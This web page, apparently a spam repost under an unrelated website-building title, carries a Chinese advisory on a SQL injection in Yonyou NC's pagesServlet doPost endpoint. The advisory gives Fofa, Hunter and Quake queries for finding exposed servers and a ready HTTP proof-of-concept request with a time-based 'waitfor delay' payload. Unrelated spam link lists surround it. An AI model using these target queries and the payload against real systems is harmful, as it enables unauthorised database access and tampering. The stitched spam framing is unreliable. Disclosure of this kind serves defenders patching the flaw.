当前位置: 首页 > news >正文

学做网站制作网页微信小程序

学做网站制作,网页微信小程序,沃噻网站建设流程,wordpress项目展示设置免责声明: 本文内容旨在提供有关特定漏洞或安全漏洞的信息,以帮助用户更好地了解可能存在的风险。公布此类信息的目的在于促进网络安全意识和技术进步,并非出于任何恶意目的。阅读者应该明白,在利用本文提到的漏洞信息或进行相关测…

免责声明:

        本文内容旨在提供有关特定漏洞或安全漏洞的信息,以帮助用户更好地了解可能存在的风险。公布此类信息的目的在于促进网络安全意识和技术进步,并非出于任何恶意目的。阅读者应该明白,在利用本文提到的漏洞信息或进行相关测试时,可能会违反某些法律法规或服务协议。同时,未经授权地访问系统、网络或应用程序可能导致法律责任或其他严重后果。作者不对读者基于本文内容而产生的任何行为或后果承担责任。读者在使用本文所提供的信息时,必须遵守适用法律法规和相关服务协议,并独自承担所有风险和责任。如有侵权,请联系删除。
免责声明

产品简介

用友NC是大型企业管理与电子商务平台,帮助企业实现管理转型升级全面从以产品为中心转向以客户为中心(C2B);从流程驱动转向数据驱动(DDE);从延时运行转为实时运行(RTE);从领导指挥到员工创新(E2M)

漏洞描述

用友 NC doPost 接口 pagesServlet 参数存在一个 SQL 注入漏洞,通过这个漏洞可以操纵服务器的数据库。这意味着不法分子可以利用这个漏洞来获取对数据库的完全控制权,从而查看、修改甚至删除数据库中的数据,严重威胁系统的安全性。

网络空间会测

Fofa

title="YONYOU NC"

Hunter

app.name="用友 NC Download Page"

Quake

app:"用友 NC"

image.png

漏洞复现

GET /portal/pt/servlet/pagesServlet/doPost?pageId=login&pk_group=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; zh-CN; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

image.png

修复建议

更新oa至最新版本

http://www.yayakq.cn/news/792156/

相关文章:

  • 潍坊模板建站平台wordpress导航站模板
  • 网站的栏目建设在哪里帮传销做网站
  • 出名的建站网站滁州注册公司流程和费用
  • 淮安网站建设淮安网站制作百度网站html验证
  • 仁寿建设局网站网站建设规划书主题
  • 凉山州住房与城乡建设局网站什么是网络营销它与传统营销相比有何特征
  • 静态手机网站建设的基本特点网站维护提醒php文件
  • 开发技术网站开发技术路线微信笔记转wordpress
  • 企业网站建设需要准备资料网站怎样添加友情链接
  • 企业网站要怎么做黄岩网站建设
  • 江苏 网站集约化建设方案WordPress邀请码注册插件
  • 做网站需要了解什么东西贵州贵州省住房和城乡建设厅网站
  • 梁山网站建设电话网站版面的美化原则
  • SharePoint做网站好吗中国城乡建设厅网站
  • 文字排版都用哪些网站免费建手机个人网站
  • 网站建设经网上工作平台
  • 外贸论坛买家信息网优化大师破解版app
  • 城镇建设部网站哪有做建筑设计的网站
  • 常州网站开发搜索引擎营销的方式
  • 做网站要准备什么iis部署网站提示建设中
  • 建站官网模板网站可信认证
  • wordpress收录p济南seo网站关键词优化排名
  • 重庆网站建设公司电话万网域名注册官网中文域名
  • 厦门seo网站排名优化wordpress 模版修改
  • 电子商务网站建设与管理的背景建设工程评标专家在哪个网站登录
  • 网站怎样自动文字排版263企业会议邮箱登录入口
  • 渠县网站建设打开app查看全部
  • 专业提供网站建设服务包括哪些建立网站的软件下载
  • 找公司做网站多少钱成都手游开服网
  • 免费企业网站源码大全企业网站个人备案吗